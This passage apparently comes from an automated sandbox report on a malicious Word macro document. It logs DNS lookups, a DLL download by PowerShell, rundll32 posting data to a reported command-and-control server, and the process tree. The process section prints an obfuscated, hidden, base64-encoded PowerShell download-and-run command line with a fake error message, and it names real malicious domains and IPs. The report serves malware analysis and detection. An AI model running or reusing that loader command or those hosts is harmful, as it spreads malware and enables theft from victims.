                                Stream Path: Macros/VBA/dir, File Type: Tower/XP rel 3 object not stripped - version 18435, Stream Size: 660
                                General
                                Stream Path:Macros/VBA/dir
                                File Type:Tower/XP rel 3 object not stripped - version 18435
                                Stream Size:660
                                Entropy:6.38918771534
                                Base64 Encoded:True
                                Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . . . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . . . m . . . . ! O f f i c
                                Data Raw:01 90 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 f3 96 ed 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                Stream Path: WordDocument, File Type: data, Stream Size: 20526
                                General
                                Stream Path:WordDocument
                                File Type:data
                                Stream Size:20526
                                Entropy:4.14121071974
                                Base64 Encoded:False
                                Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . J . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . b . . . b . . . . B . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 d9 4a 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 50 00 00 62 7f 00 00 62 7f 00 00 d9 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                01/12/21-19:16:23.562924TCP2404340ET CNC Feodo Tracker Reported CnC Server TCP group 214917080192.168.2.2271.72.196.159

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jan 12, 2021 19:16:04.220208883 CET49165443192.168.2.2251.79.161.36
                                Jan 12, 2021 19:16:04.427264929 CET4434916551.79.161.36192.168.2.22
                                Jan 12, 2021 19:16:04.427385092 CET49165443192.168.2.2251.79.161.36
                                Jan 12, 2021 19:16:04.441338062 CET49165443192.168.2.2251.79.161.36
                                Jan 12, 2021 19:16:04.648400068 CET4434916551.79.161.36192.168.2.22
                                Jan 12, 2021 19:16:04.648617983 CET4434916551.79.161.36192.168.2.22
                                Jan 12, 2021 19:16:04.648642063 CET4434916551.79.161.36192.168.2.22
                                Jan 12, 2021 19:16:04.648689985 CET4434916551.79.161.36192.168.2.22
                                Jan 12, 2021 19:16:04.648737907 CET49165443192.168.2.2251.79.161.36
                                Jan 12, 2021 19:16:04.648901939 CET49165443192.168.2.2251.79.161.36
                                Jan 12, 2021 19:16:04.662923098 CET49165443192.168.2.2251.79.161.36
                                Jan 12, 2021 19:16:04.663800001 CET49166443192.168.2.2251.79.161.36
                                Jan 12, 2021 19:16:04.862540960 CET4434916651.79.161.36192.168.2.22
                                Jan 12, 2021 19:16:04.862718105 CET49166443192.168.2.2251.79.161.36
                                Jan 12, 2021 19:16:04.863187075 CET49166443192.168.2.2251.79.161.36
                                Jan 12, 2021 19:16:04.870026112 CET4434916551.79.161.36192.168.2.22
                                Jan 12, 2021 19:16:05.061920881 CET4434916651.79.161.36192.168.2.22
                                Jan 12, 2021 19:16:05.062295914 CET4434916651.79.161.36192.168.2.22
                                Jan 12, 2021 19:16:05.062325001 CET4434916651.79.161.36192.168.2.22
                                Jan 12, 2021 19:16:05.062357903 CET4434916651.79.161.36192.168.2.22
                                Jan 12, 2021 19:16:05.062414885 CET49166443192.168.2.2251.79.161.36
                                Jan 12, 2021 19:16:05.062875032 CET49166443192.168.2.2251.79.161.36
                                Jan 12, 2021 19:16:05.064313889 CET49166443192.168.2.2251.79.161.36
                                Jan 12, 2021 19:16:05.145780087 CET49167443192.168.2.22185.2.4.29
                                Jan 12, 2021 19:16:05.197062969 CET44349167185.2.4.29192.168.2.22
                                Jan 12, 2021 19:16:05.197251081 CET49167443192.168.2.22185.2.4.29
                                Jan 12, 2021 19:16:05.197689056 CET49167443192.168.2.22185.2.4.29
                                Jan 12, 2021 19:16:05.248888016 CET44349167185.2.4.29192.168.2.22
                                Jan 12, 2021 19:16:05.248907089 CET44349167185.2.4.29192.168.2.22
                                Jan 12, 2021 19:16:05.249005079 CET44349167185.2.4.29192.168.2.22
                                Jan 12, 2021 19:16:05.249093056 CET49167443192.168.2.22185.2.4.29
                                Jan 12, 2021 19:16:05.251177073 CET49167443192.168.2.22185.2.4.29
                                Jan 12, 2021 19:16:05.251851082 CET49168443192.168.2.22185.2.4.29
                                Jan 12, 2021 19:16:05.263067961 CET4434916651.79.161.36192.168.2.22
                                Jan 12, 2021 19:16:05.302382946 CET44349167185.2.4.29192.168.2.22
                                Jan 12, 2021 19:16:05.303016901 CET44349168185.2.4.29192.168.2.22
                                Jan 12, 2021 19:16:05.303092957 CET49168443192.168.2.22185.2.4.29
                                Jan 12, 2021 19:16:05.303483009 CET49168443192.168.2.22185.2.4.29
                                Jan 12, 2021 19:16:05.354767084 CET44349168185.2.4.29192.168.2.22
                                Jan 12, 2021 19:16:05.354849100 CET44349168185.2.4.29192.168.2.22
                                Jan 12, 2021 19:16:05.354964018 CET44349168185.2.4.29192.168.2.22
                                Jan 12, 2021 19:16:05.355037928 CET49168443192.168.2.22185.2.4.29
                                Jan 12, 2021 19:16:05.357589960 CET49168443192.168.2.22185.2.4.29
                                Jan 12, 2021 19:16:05.408828974 CET44349168185.2.4.29192.168.2.22
                                Jan 12, 2021 19:16:05.758419037 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:05.992652893 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:05.992826939 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:05.992989063 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:06.226633072 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.229259968 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.229289055 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.229307890 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.229326010 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.229338884 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:06.229357958 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.229374886 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.229398012 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:06.229412079 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:06.229423046 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.229440928 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.229458094 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.229473114 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.229481936 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:06.229506969 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:06.463335037 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463362932 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463380098 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463392019 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463403940 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463417053 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463433027 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463448048 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:06.463457108 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:06.463469982 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463486910 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463505983 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:06.463515997 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463536024 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463547945 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:06.463562965 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463581085 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463594913 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:06.463604927 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463622093 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463638067 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:06.463645935 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463661909 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463671923 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:06.463686943 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463695049 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:06.463711023 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463726997 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.463742018 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:06.657936096 CET4916980192.168.2.22152.32.168.168
                                Jan 12, 2021 19:16:06.697458982 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.697488070 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.697505951 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.697529078 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.697554111 CET8049169152.32.168.168192.168.2.22
                                Jan 12, 2021 19:16:06.697577000 CET8049169152.32.168.168192.168.2.22

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jan 12, 2021 19:16:03.922451019 CET5219753192.168.2.228.8.8.8
                                Jan 12, 2021 19:16:04.207346916 CET53521978.8.8.8192.168.2.22
                                Jan 12, 2021 19:16:05.088341951 CET5309953192.168.2.228.8.8.8
                                Jan 12, 2021 19:16:05.145020008 CET53530998.8.8.8192.168.2.22
                                Jan 12, 2021 19:16:05.367438078 CET5283853192.168.2.228.8.8.8
                                Jan 12, 2021 19:16:05.757515907 CET53528388.8.8.8192.168.2.22

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Jan 12, 2021 19:16:03.922451019 CET192.168.2.228.8.8.80x62a5Standard query (0)shulovbaazar.comA (IP address)IN (0x0001)
                                Jan 12, 2021 19:16:05.088341951 CET192.168.2.228.8.8.80x523fStandard query (0)mybusinessevent.comA (IP address)IN (0x0001)
                                Jan 12, 2021 19:16:05.367438078 CET192.168.2.228.8.8.80x51f2Standard query (0)uhk.cncranes.comA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Jan 12, 2021 19:16:04.207346916 CET8.8.8.8192.168.2.220x62a5No error (0)shulovbaazar.com51.79.161.36A (IP address)IN (0x0001)
                                Jan 12, 2021 19:16:05.145020008 CET8.8.8.8192.168.2.220x523fNo error (0)mybusinessevent.com185.2.4.29A (IP address)IN (0x0001)
                                Jan 12, 2021 19:16:05.757515907 CET8.8.8.8192.168.2.220x51f2No error (0)uhk.cncranes.comuhk.asiash.comCNAME (Canonical name)IN (0x0001)
                                Jan 12, 2021 19:16:05.757515907 CET8.8.8.8192.168.2.220x51f2No error (0)uhk.asiash.com152.32.168.168A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • uhk.cncranes.com
                                • 69.49.88.46

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.2249169152.32.168.16880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampkBytes transferredDirectionData
                                Jan 12, 2021 19:16:05.992989063 CET4OUTGET /ErrorPages/3/ HTTP/1.1
                                Host: uhk.cncranes.com
                                Connection: Keep-Alive
                                Jan 12, 2021 19:16:06.229259968 CET6INHTTP/1.1 200 OK
                                Server: nginx
                                Date: Tue, 12 Jan 2021 18:16:06 GMT
                                Content-Type: application/octet-stream
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Keep-Alive: timeout=60
                                Set-Cookie: 5ffde7661f466=1610475366; expires=Tue, 12-Jan-2021 18:17:06 GMT; Max-Age=60; path=/
                                Cache-Control: no-cache, must-revalidate
                                Pragma: no-cache
                                Last-Modified: Tue, 12 Jan 2021 18:16:06 GMT
                                Expires: Tue, 12 Jan 2021 18:16:06 GMT
                                Content-Disposition: attachment; filename="SfDrGyeyuy.dll"
                                Content-Transfer-Encoding: binary
                                Data Raw: 33 65 37 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 5a de fd 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 46 00 00 00 d4 04 00 00 00 00 00 f0 21 00 00 00 10 00 00 00 60 00 00 00 00 00 10 00 10 00 00 00 02 00 00 03 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 01 09 06 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 70 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 05 00 58 15 00 00 00 50 05 00 d4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 72 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8b 43 00 00 00 10 00 00 00 44 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0c 01 00 00 00 60 00 00 00 02 00 00 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 08 00 00 00 70 00 00 00 0a 00 00 00 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 a4 bf 04 00 00 80 00 00 00 c0 04 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 35 00 00 64 00 00 00 00 40 05 00 00 02 00 00 00 14 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 65 6c 6f 63 00 00 d4 07 00 00 00 50 05 00 00 08 00 00 00 16 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Data Ascii: 3e70MZ@!L!This program cannot be run in DOS mode.$PELZ_!2F!``pdXPxr.textCD `.rdata`H@@.datapJ@.text4T@.text5d@ @.relocP@B


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.224917169.49.88.4680C:\Windows\SysWOW64\rundll32.exe
                                TimestampkBytes transferredDirectionData
                                Jan 12, 2021 19:16:37.122618914 CET364OUTPOST /kdd8h70lwp/lfu3p05/u2kanr3/ HTTP/1.1
                                DNT: 0
                                Referer: 69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/
                                Content-Type: multipart/form-data; boundary=--------------IOWFryyt5oe5vI
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: 69.49.88.46
                                Content-Length: 5572
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Jan 12, 2021 19:16:38.436824083 CET371INHTTP/1.1 200 OK
                                Server: nginx
                                Date: Tue, 12 Jan 2021 18:16:38 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Vary: Accept-Encoding
                                Data Raw: 39 39 34 0d 0a 18 0c 33 81 a5 5c 21 07 48 98 20 3e ef 9b b4 36 51 a4 10 c4 36 26 94 da be ac 37 1b c0 26 61 78 e1 3a c8 e4 19 89 b1 c6 8b 33 df 6e 09 2b e6 91 64 a8 37 ce a4 5a c5 0e 46 a5 72 2b 7f ea 5b 22 cc d9 e8 2a ce 37 57 64 6b 3d cf 97 75 7a c0 30 ec f7 a3 a1 48 0f e9 96 aa 07 7f 8b 7e 5c 37 d1 18 3c 20 de ee d7 a6 76 9e 3f a1 e4 1f 30 8d ab 05 8b c1 6a 9f 30 0b 30 e4 bc a8 3b dd 80 a5 3a 8a 44 56 d9 9c e2 00 15 ab ab 2e d8 97 37 ab 65 54 5e c8 01 af a9 ad 73 36 cc b0 a7 08 12 ae 0d 08 8a cb bb 9f 5e b1 e5 1b d6 a7 c5 09 db e9 72 a7 1a 9d a1 c9 34 4c ff 1d be e3 21 ff be ed 55 c2 55 f6 b9 cd 84 11 e1 79 f1 38 1c 91 ea 2f fd 74 58 27 88 5f 73 5d 3f 78 1b 56 7c d2 c8 90 80 b5 70 fb b5 0c 1d 0b 81 24 30 5a e2 c6 3e 43 4c 93 87 8d 67 c9 8f a1 72 d2 4c 9d 65 27 9b 38 46 cd 9d ca 59 15 a8 81 c1 a7 16 32 7f 15 e8 51 51 21 d8 05 80 2b 51 e4 f5 9b 97 86 45 d9 be 65 df 8d b5 ea bd d8 3c 49 8b bc 18 d0 93 27 2a 5e 30 38 fd 3b 19 4e 5c 11 f0 ab 5c a5 87 60 bc 51 81 0d e7 93 5e 34 d3 fb 0a a7 85 21 0a e2 32 77 28 d2 9e 1b db fa 12 23 dc 7b 5e 33 5c 13 9c b7 94 9b d1 92 ab 97 14 73 40 8b 58 45 8b f5 48 b2 1d d9 f8 b0 92 12 60 60 b9 0c 3e 9c 8d dd 95 0f a1 10 48 76 f7 39 ed 16 99 fe b7 f8 69 8f e9 47 43 9d a5 2d 66 68 c2 cb 95 a6 a4 ee 1d 67 ae 5f f5 0d e5 b0 d3 0c f3 c6 ec 99 86 9e 34 25 95 ce af c3 78 4c da 95 4d 73 96 8e 3c 9e e3 39 3d 95 3e b4 89 34 79 ab 42 81 5a 3c 5c 7f 0d 68 1f c7 c7 60 98 f8 21 65 3e ed 9c c9 47 c1 b4 45 70 29 22 51 9f 18 14 4b 41 27 fa 9d c7 f4 0f e4 8a e6 86 48 f0 a8 8c d9 e0 02 32 75 fe f9 ec 4f 70 c2 b0 67 63 b2 15 6f 3f fe f3 96 d8 e0 40 f7 a5 db aa 68 3b a6 5d 5b 4d e6 90 f0 b4 90 03 68 92 b4 f5 4b 8b 72 3d 76 26 b3 f1 df 06 cc a0 8f 4c ce 4a ba 0b 9b 82 88 6c 2c a3 02 f2 68 84 09 df f4 5c 0a 8f 49 8b 3b b0 a1 10 fb 2c 2b 8e e6 67 2d 3f 43 e5 33 30 36 09 65 13 04 b9 6d 48 08 1c 03 9f 4b 11 af 47 4d de d4 96 53 f7 31 8a c4 00 2f 68 0d c4 e3 33 cc 20 12 07 d3 b7 8d 1a 86 f5 6d 29 d9 d6 b0 1d 78 b7 98 f7 40 6c c0 41 05 d5 4c a7 5e e5 56 e4 9d 5a f2 07 20 83 78 4c 4b 88 f5 28 41 0a 48 ae 33 b8 54 ed db 5c cf fc 43 d4 5f 25 db bb 55 e7 6a ca 5d 8f a4 2e 85 63 40 ba 77 6b 51 2c 20 b8 74 37 9d 9b dd 17 c7 0c 5a e1 56 d9 d1 f9 4c 05 5d 19 c9 36 d9 9b bc 1e bf 35 d9 95 43 9c 53 56 03 fe 52 62 06 35 f1 3d 20 72 f8 e0 e4 71 2f 04 d9 6d e6 30 1d eb a3 fc 95 9b 18 fc 78 ca 25 48 f1 62 8d 66 16 97 4e f6 c5 40 24 e0 55 da 65 3b bb b3 d8 4e d0 1c 4a 4b d1 60 23 b0 ab ac 02 2d 45 c9 fa ee 74 18 c3 91 82 0b 2c 8d 1c 68 5f 10 c0 c9 6a 03 e3 39 df e5 f5 3c a8 85 9e 0a 00 26 50 af 79 5c 35 b4 3d 09 79 90 a4 c0 90 2a b0 4a a4 33 42 59 02 38 ba a4 e0 43 09 ef a5 b8 38 f4 df 48 ee 9e 07 49 a9 81 ff cb 83 bf 8a e2 15 28 00 8d e7 83 4d b0 32 b8 54 14 99 fb 8b 24 38 94 95 a8 62 3b d8 dc 08 76 05 da 71 66 e3 ef 5a db 4f 4a de 33 f5 b8 41 3c cf c3 aa 84 14 02 91 1c d4 eb cd 35 1d 7b 85 ac 78 3c 39 42 32 f2 49 61 91 47 4b 64 3c 34 35 6f 46 95 a6 08 c3 4a 57 15 3b 10 d5 c4 5e 84 81 f5 0b d0 4d fa b1 1b 2c 9f 4a 02 cd 84 08 69 d0 c3 dc e4 d4 b4 8b b7 bc e9 5e 0c 3a 34 aa 80 9b 6a 12 6b 74 cc d7 76 f7 0b 7f 53 7b 80 4b 06 3e d1 3e 81 f6 c3 ce ec 8d 6f a7 dd 14 43 cc 38 44 12 2c dd b0 c6 6a 11 52 29 a8 3f b2 92 ff fb 96 c2 19 a3 ce 14 ed 65 ea d4 0b 14 16 b8 68 22 df 49 14 3e fb af 93 d7 60 9f 11 07 31 85 6c a3 65 41 58 a7 3d 43 f2 8b f5 11 b7 f4 ff e8 c1 f2 78 97 8d fe c9 d4 0b 37 0f a1 3d ea 74 f8 2d d8 e8 ee 5a e3 44 b9 86 59 c7 3f 13 ae c1 d7 c2 43 74 c3 5e 01 ff 09 14 0b 34 6c b0 86 c6 d7 6b 72 df
                                Data Ascii: 9943\!H >6Q6&7&ax:3n+d7ZFr+["*7Wdk=uz0H~\7< v?0j00;:DV.7eT^s6^r4L!UUy8/tX'_s]?xV|p$0Z>CLgrLe'8FY2QQ!+QEe<I'*^08;N\\`Q^4!2w(#{^3\s@XEH``>Hv9iGC-fhg_4%xLMs<9=>4yBZ<\h`!e>GEp)"QKA'H2uOpgco?@h;][MhKr=v&LJl,h\I;,+g-?C306emHKGMS1/h3 m)x@lAL^VZ xLK(AH3T\C_%Uj].c@wkQ, t7ZVL]65CSVRb5= rq/m0x%HbfN@$Ue;NJK`#-Et,h_j9<&Py\5=y*J3BY8C8HI(M2T$8b;vqfZOJ3A<5{x<9B2IaGKd<45oFJW;^M,Ji^:4jktvS{K>>oC8D,jR)?eh"I>`1leAX=Cx7=t-ZDY?Ct^4lkr


                                Code Manipulations

                                Statistics

                                Behavior

                                Click to jump to process

                                System Behavior

                                Analysis Process: WINWORD.EXE PID: 1604 Parent PID: 584

                                General

                                Start time:19:15:38
                                Start date:12/01/2021
                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                Wow64 process (32bit):false
                                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                Imagebase:0x13fdc0000
                                File size:1424032 bytes
                                MD5 hash:95C38D04597050285A18F66039EDB456
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Analysis Process: cmd.exe PID: 2340 Parent PID: 1220

                                General

                                Start time:19:15:40
                                Start date:12/01/2021
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwB